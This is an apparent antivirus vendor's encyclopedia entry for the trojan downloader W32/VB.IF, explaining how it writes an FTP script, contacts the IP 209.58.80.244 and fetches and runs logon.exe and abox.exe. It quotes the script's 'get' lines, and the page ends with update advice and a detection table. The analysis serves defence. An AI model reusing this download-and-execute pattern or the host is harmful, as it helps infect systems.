W32/VB.IF!tr.dldr
Analysis
This Trojan downloads components that deliver porn to the compromised system. The related files installed are
logon.exe - 69,632 bytes
abox.exe - 36,864 bytes
These files are commonly installed to the Windows folder, and may load via the system registry from the common RUN location.
FTP transfer
When the Trojan is first run, it connects with an IP
address 209.58.80.244 using the system's own file transfer
utility called FTP.EXE. The Trojan first writes an FTP
script file into the TEMP folder named "Abox.ftp"
and then runs FTP passing the script as a parameter.
The script instructs FTP to retrieve files by their
remote name and copy them to the Windows folder -
get ABox.exe C:\WINNT\ABox.exe
get logon.exe C:\WINNT\logon.exe
get ABox.bup C:\WINNT\ABox.bup
The Windows folder name is determined before the FTP script is created. After all files are retrieved, both executables are run. The file "ABox.bup" contains update information for the Trojan.
Miscellaneous
The file "abox.exe" is referenced as "Fun
Box" by the author.
Recommended Action
- check the main screen using the web interface to
ensure the latest AV/NIDS database has been downloaded
and installed -- if required, enable the "Allow
Push Update" option
FortiGate systems:
Telemetry
Detection Availability
FortiClient | |
---|---|
Extended | |
FortiMail | |
Extended | |
FortiSandbox | |
Extended | |
FortiWeb | |
Extended | |
Web Application Firewall | |
Extended | |
FortiIsolator | |
Extended | |
FortiDeceptor | |
Extended |